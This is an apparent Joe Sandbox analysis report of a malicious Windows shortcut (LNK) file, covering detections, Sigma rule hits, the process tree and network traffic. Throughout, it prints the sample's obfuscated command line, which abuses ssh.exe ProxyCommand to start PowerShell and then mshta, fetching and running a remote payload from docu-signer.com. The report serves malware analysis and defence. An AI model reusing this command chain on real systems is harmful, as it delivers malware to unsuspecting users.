Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DypA6KbLrn.lnk

Overview

General Information

Sample name:DypA6KbLrn.lnk
renamed because original name is a hash value
Original sample name:25e7cee7a15413a5171636165e0e0473.lnk
Analysis ID:1582824
MD5:25e7cee7a15413a5171636165e0e0473
SHA1:abace591e3418a1b64cc38f37851b7b4da7347cf
SHA256:4ae7c304075927398c65e980aa93f181d18dcf52265f6acc82e530d46ffc7ba4
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 7492 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7556 cmdline: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7764 cmdline: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7684, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, ProcessId: 7764, ProcessName: mshta.exe
Sigma detected: Lolbin Ssh.exe Use As Proxy
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., ProcessId: 7492, ProcessName: ssh.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57), CommandLine: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7492, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57), ProcessId: 7556, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7920, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://docu-signer.com/api/uz/0912545164/index.mp4LAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4C:Avira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp44Avira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:pAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4Avira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4HAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4...Avira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4$global:?Avira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.mAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4indowsAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4pAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4tAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4qAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4yAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4xAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZdAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4RAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4cAvira URL Cloud: Label: malware
Source: https://docu-signer.com/api/uz/0912545164/index.mp4fAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: DypA6KbLrn.lnkReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.6% probability
Machine Learning detection for sample
Source: DypA6KbLrn.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/index.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docu-signer.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://docu-signer.com/api/uz/0912545164/index.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docu-signer.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://docu-signer.com/api/uz/0912545164/index.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docu-signer.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/index.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docu-signer.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://docu-signer.com/api/uz/0912545164/index.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docu-signer.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://docu-signer.com/api/uz/0912545164/index.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docu-signer.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: docu-signer.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 31 Dec 2024 14:41:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lomOCgu9kEEfK2C8kSDEi6gRxd1TFMSDdFXSc4UQzFI2wrJ%2FZxWDFtDHWYselPQvATrwRrXkj0bUUpB6KuFKvbKIKJjcHSi6bWun2Un87ZwfPsKciNFGQXhfPcN3eiMm3w8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fab085da9a372b9-EWR
Source: svchost.exe, 00000007.00000002.2680213004.0000025E2B610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1462404136.000002A83B9A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1462404136.000002A83B9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1462404136.000002A83BA01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/S
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/W
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC4E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4
Source: powershell.exeString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4$global:?
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4...
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp44
Source: ssh.exe, 00000001.00000002.2676527197.000002931A8C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, DypA6KbLrn.lnkString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC4E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4C:
Source: mshta.exe, 00000005.00000002.2678000406.00000178AC670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:p
Source: mshta.exe, 00000005.00000002.2677825306.00000178AC620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4H
Source: powershell.exe, 00000004.00000002.1464783976.000002A853C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4L
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4R
Source: powershell.exe, 00000004.00000002.1464783976.000002A853C50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4c
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4f
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4h
Source: mshta.exe, 00000005.00000002.2681800480.00000180AF285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m
Source: powershell.exe, 00000004.00000002.1461122736.000002A8399B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4indows
Source: powershell.exe, 00000004.00000002.1462404136.000002A83B9A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4p
Source: powershell.exe, 00000004.00000002.1462221215.000002A83B440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4q
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4t
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4x
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4y
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC53C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682717479.00000180B392C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637$fE
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...o
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...u
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...x
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?13767556374gU
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637L
Source: mshta.exe, 00000005.00000002.2682717479.00000180B392C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637a
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637ent(
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637fn
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637m
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637rg
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637z
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/phish-bypass
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/phish-bypassG
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/phish-bypassQ
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/phish-bypassg.mp4T
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/phish-bypasstp4y
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC5AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/styles/cf.errors.css
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/styles/cf.errors.css$
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/styles/cf.errors.css4
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/styles/cf.errors.cssD
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/cdn-cgi/styles/cf.errors.cssL
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.1483836146.0000025E2B360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingh
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingt
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/Tf
Source: mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/dg
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49706 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: DypA6KbLrn.lnkLNK file: -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.winLNK@9/11@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apgduuv1.a1z.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DypA6KbLrn.lnkReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4Jump to behavior
